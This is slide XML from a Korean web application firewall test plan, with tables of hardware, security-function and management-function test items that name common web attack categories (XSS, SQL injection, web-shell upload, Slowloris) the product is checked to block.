            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4952961" y="4423579"/>
              <a:ext cx="1589269" cy="1274055"/>
              <a:chOff x="4952961" y="4211144"/>
              <a:chExt cx="1589269" cy="1274055"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 71">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C239CD3A-763A-4F4A-B63D-D0C88C6C6C95}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5663734" y="4893061"/>
                <a:ext cx="878496" cy="592138"/>
                <a:chOff x="6092238" y="3664622"/>
                <a:chExt cx="878496" cy="592138"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="42" name="AutoShape 38">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89DB7066-FA25-4EA4-B447-C42987621D7A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092238" y="3664622"/>
                  <a:ext cx="878496" cy="5921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3" name="Rectangle 40">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21234D19-07E6-4F24-9AB6-8D223D7A59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33036" y="3743997"/>
                  <a:ext cx="596900" cy="43497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4" name="Rectangle 41">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7ABD5BB7-32B9-4364-BF6C-227050983F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247323" y="4136109"/>
                  <a:ext cx="568325" cy="28575"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:pr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5" name="Freeform 42">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C4F1EC2-F2CB-4E25-975B-C2D079001B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58423" y="4178972"/>
                  <a:ext cx="746125" cy="0"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 470"/>
                    <a:gd name="T1" fmla="*/ 470 w 470"/>
                    <a:gd name="T2" fmla="*/ 0 w 470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470">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="47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6" name="Line 43">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69764CDD-D043-4E71-B8E4-7F8CBDAFCDE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158423" y="4178972"/>
                  <a:ext cx="746125" cy="0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  <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="Freeform 44">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F476A04-00EA-458E-923E-D4FB8A30B1B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158423" y="3729709"/>
                  <a:ext cx="746125" cy="465137"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 432 w 470"/>
                    <a:gd name="T1" fmla="*/ 274 h 293"/>
                    <a:gd name="T2" fmla="*/ 432 w 470"/>
                    <a:gd name="T3" fmla="*/ 0 h 293"/>
                    <a:gd name="T4" fmla="*/ 38 w 470"/>
                    <a:gd name="T5" fmla="*/ 0 h 293"/>
                    <a:gd name="T6" fmla="*/ 38 w 470"/>
                    <a:gd name="T7" fmla="*/ 274 h 293"/>
                    <a:gd name="T8" fmla="*/ 0 w 470"/>
                    <a:gd name="T9" fmla="*/ 274 h 293"/>
                    <a:gd name="T10" fmla="*/ 0 w 470"/>
                    <a:gd name="T11" fmla="*/ 293 h 293"/>
                    <a:gd name="T12" fmla="*/ 470 w 470"/>
                    <a:gd name="T13" fmla="*/ 293 h 293"/>
                    <a:gd name="T14" fmla="*/ 470 w 470"/>
                    <a:gd name="T15" fmla="*/ 274 h 293"/>
                    <a:gd name="T16" fmla="*/ 432 w 470"/>
                    <a:gd name="T17" fmla="*/ 274 h 293"/>
                    <a:gd name="T18" fmla="*/ 56 w 470"/>
                    <a:gd name="T19" fmla="*/ 274 h 293"/>
                    <a:gd name="T20" fmla="*/ 56 w 470"/>
                    <a:gd name="T21" fmla="*/ 18 h 293"/>
                    <a:gd name="T22" fmla="*/ 414 w 470"/>
                    <a:gd name="T23" fmla="*/ 18 h 293"/>
                    <a:gd name="T24" fmla="*/ 414 w 470"/>
                    <a:gd name="T25" fmla="*/ 274 h 293"/>
                    <a:gd name="T26" fmla="*/ 56 w 470"/>
                    <a:gd name="T27" fmla="*/ 274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70" h="293">
                      <a:moveTo>
                        <a:pt x="432" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="432" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="293"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="470" y="293"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="470" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="432" y="274"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="56" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="56" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56" y="27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/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="60" name="직선 연결선 59">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E41DA58-17A4-40F8-8494-E86F6EA06083}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="6066150" y="4747491"/>
                <a:ext cx="0" cy="22494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id="{87FA887C-47E7-4557-8C17-A699455770A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52961" y="4747491"/>
                <a:ext cx="113166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직선 연결선 61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8160EB8A-A7F8-46C9-AD32-615C71424A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962197" y="4211144"/>
                <a:ext cx="0" cy="53634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8" name="연결선: 꺾임 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03F9C3AE-9579-40A7-8387-0253E7CE3619}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="25" idx="3"/>
              <a:endCxn id="14" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5120587" y="2966748"/>
              <a:ext cx="2320794" cy="1243222"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -985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연결선: 꺾임 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DBC0B6E-370F-4A1F-BFD9-BE5FF6329648}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="18" idx="1"/>
              <a:endCxn id="14" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1" flipV="1">
              <a:off x="2154820" y="2896898"/>
              <a:ext cx="2433380" cy="1313072"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -9394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148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CC4610A-945C-4582-8FD3-B8A1ADB3C3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5469" y="5720092"/>
              <a:ext cx="75501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ko-KR" altLang="en-US" sz="800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="231F2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웹방화벽 관리자</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="ko-K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4" name="Rectangle 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C63F5334-3B6D-4E07-971D-E3ACE73D6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9211" y="5720092"/>
              <a:ext cx="652423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800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="231F20"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                  <a:ea typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                </a:rPr>
                <a:t>계측기 관리자</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="ko-K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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="76" name="연결선: 꺾임 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0BE208E-99C8-4130-9893-B8A5E6595370}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="18" idx="0"/>
              <a:endCxn id="12" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="4790871" y="476291"/>
              <a:ext cx="12965" cy="4315685"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -4684080"/>
              </a:avLst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연결선: 꺾임 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46A5E8C7-7BCB-4853-AFFD-FDA9395ECDC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="18" idx="2"/>
              <a:endCxn id="25" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="4793966" y="1011691"/>
              <a:ext cx="6777" cy="4315684"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 3473174"/>
              </a:avLst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Rectangle 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A73919C-948A-4261-AB2C-6D75BF5D5B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8681" y="2169513"/>
              <a:ext cx="21320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800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="231F2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opt0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name="Rectangle 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A709F3-E038-4084-91A2-03D7F28AC7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9576" y="2694560"/>
              <a:ext cx="16511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800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="231F2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ctl0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="84" name="Rectangle 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D669546D-2EB0-41F9-A3FC-A9DB74A34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8681" y="3287234"/>
              <a:ext cx="213200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ko-KR" sz="800" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="231F2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opt1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0125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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-122962" y="2037536"/>
            <a:ext cx="8394485" cy="1286633"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>시험 항목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E28E4E2E-0F8A-404C-BE29-90C770433175}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3400950" y="3120190"/>
            <a:ext cx="5338167" cy="3168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ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>기능 시험 항목 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altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>H/W </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>구성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>보안기능</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>관리기능</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>성능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>기능 평가 항목</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1495635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시험 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="내용 개체 틀 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D3B9274-1DBB-41C1-8B68-A62967169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r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="아리따-돋움(TTF)-Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>H/W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="아리따-돋움(TTF)-Light" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="아리따-돋움(TTF)-Light" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Group 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{506B4F45-975C-47DB-8D23-EB8858CEC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915653"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611188" y="1412875"/>
          <a:ext cx="8175625" cy="1824990"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="725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6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분류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시험번호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평가 항목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</a:t>
                      </a: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H/W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구성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CPU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사양 확인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1.2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Memory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사양 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AutoNum type="arabicPeriod"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HDD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사양 확인</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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1.4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Network Interface</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" baseline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="1" baseline="0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사양 확인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맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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Dual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Power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756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시험 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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CA6006AE-7FF0-4A7D-B079-DD542C155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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>보안기능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea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0" name="Group 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D38AEF3A-7C11-497F-B361-FFCDECA283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323876"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611188" y="1412875"/>
          <a:ext cx="8175625" cy="4682490"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="725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69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17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분류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시험번호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항목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 rowSpan="1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보안기능 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Input Parameter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에 대한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Buffer-Overflow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공격 탐지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차단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Cookie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변조 공격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Content Spoofing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2.4-1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XSS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및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XSS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우회 공격 차단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2.4-2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XSS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시 태그 무력화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2.4-3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이미지 태그를 이용한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XSS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및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XSS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우회 공격 차단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Directory Listing / Directory Traversal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노출 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서버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어플리케이션 에러 노출 방지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fontAlgn="ctr" latinLnBrk="1" hangingPunct="1"/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웹 서버</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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어플리케이션 파일 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="0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확장자</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="10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접근 제한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미 허용 파일 및 이미지 파일 위장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웹쉘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업로드 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File Include Injection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공격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비속어 방지를 위한 차단 및 문자열 치환기능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HTTP RFC Compliance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HTTP URL Compliance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검증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국가 및 사용자가 지정 출발지 대역에 차단 기능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5492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시험 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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CA6006AE-7FF0-4A7D-B079-DD542C155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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>보안기능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea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6" name="Group 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE93F2F2-95EF-4B7F-A6EB-0DA7E7E2A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937714"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611188" y="1412875"/>
          <a:ext cx="8175625" cy="4682490"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="725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6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분류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시험번호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항목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 rowSpan="15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보안기능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Hidden Field Manipulation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개인정보 노출 방지 및 변조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개인정보 입력 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2.17</a:t>
                      </a:r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개인정보가 포함된 압축파일 다운로드</a:t>
                      </a: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업로드 방지</a:t>
                      </a:r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2.18</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/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서버 정보 노출 방지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2.19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Positive / Negative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방식의 요청 헤더 검증 및 방지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SQL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구문 삽입 공격 방지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HTTP/HTTPS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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Slowris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/R.U.D.Y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방지 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Hash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DOS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공격 방지 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부정 로그인 방지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POST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요청 검증 기능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상대경로 탐지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Request Method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를 이용한 이상접근 차단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Malgun Gothic" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="Malgun Gothic" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>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SSI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인젝션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차단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Malgun Gothic" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        <a:ea typeface="Malgun Gothic" panose="020B0503020000020004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gzip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/deflate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처리 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700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시험 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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CA6006AE-7FF0-4A7D-B079-DD542C155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>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>보안기능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea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6" name="Group 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE93F2F2-95EF-4B7F-A6EB-0DA7E7E2A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727974"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611188" y="1412875"/>
          <a:ext cx="8175625" cy="2396490"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="725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6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분류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시험번호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항목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보안기능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NoSql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Injection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공격 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XXE injection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공격 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Custom rule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Insecure Deserialization </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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공격 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881094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Xpath</a:t>
                      </a:r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Injection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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공격 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57568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LDAP Injection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" alt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공격 방지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5686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l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URL Encryption</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1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8993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4383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시험 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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CA6006AE-7FF0-4A7D-B079-DD542C155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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>관리기능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea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6" name="Group 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF6206E-22AD-4E8E-95F0-18831E9B47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560153"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611188" y="1412875"/>
          <a:ext cx="8175625" cy="4968240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="725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6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분류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시험번호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항목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 rowSpan="1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관리기능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Positive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정책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Negative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정책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사용자 정의 정책 지원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실시간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시간대별 세션정보 및 데이터 모니터링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분석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실시간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시간대별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Web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트래픽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및 시스템 자체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부하량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표시</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" baseline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장애 시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Bypass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기능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탐지 이벤트에 대한 각종 조건 검색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보고서 기능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접속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정책변경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자체 침입에 대한 이벤트 등의 감사 기능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시스템 주요파일 백업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복구 기능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장비 및 주요 이벤트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알람기능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홈페이지 관리자 접근제어 기능</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91438" marR="9143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예외처리 지원 방식 확인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3.12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관제시스템 연동 지원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인증서 관리 지원 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인증서 만료일전에 알림 기능 지원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TLS 1.3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지원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탐지로그 검색관리 및 운용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7741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시험 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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CA6006AE-7FF0-4A7D-B079-DD542C155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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>관리기능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea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6" name="Group 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084009AF-F9FE-4AC0-9170-D1A6A979C5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603646"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611188" y="1412875"/>
          <a:ext cx="8175625" cy="4968240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="725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6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분류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시험번호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항목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 rowSpan="1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관리기능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임시페이지 기능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이중화 장비간 정책 동기화 가능 여부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3.19-1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자가점검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CPU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85623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3.19-2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자가점검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MEM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4149096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3.19-3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자가점검 패킷 처리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236675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국가정보원 검증필 암호 모듈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(CIS-CC v3.3)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탑재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501819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관리자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로그인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시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단계 인증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dirty="0"/>
                        <a:t>(2-Factor Authentication) </a:t>
                      </a:r>
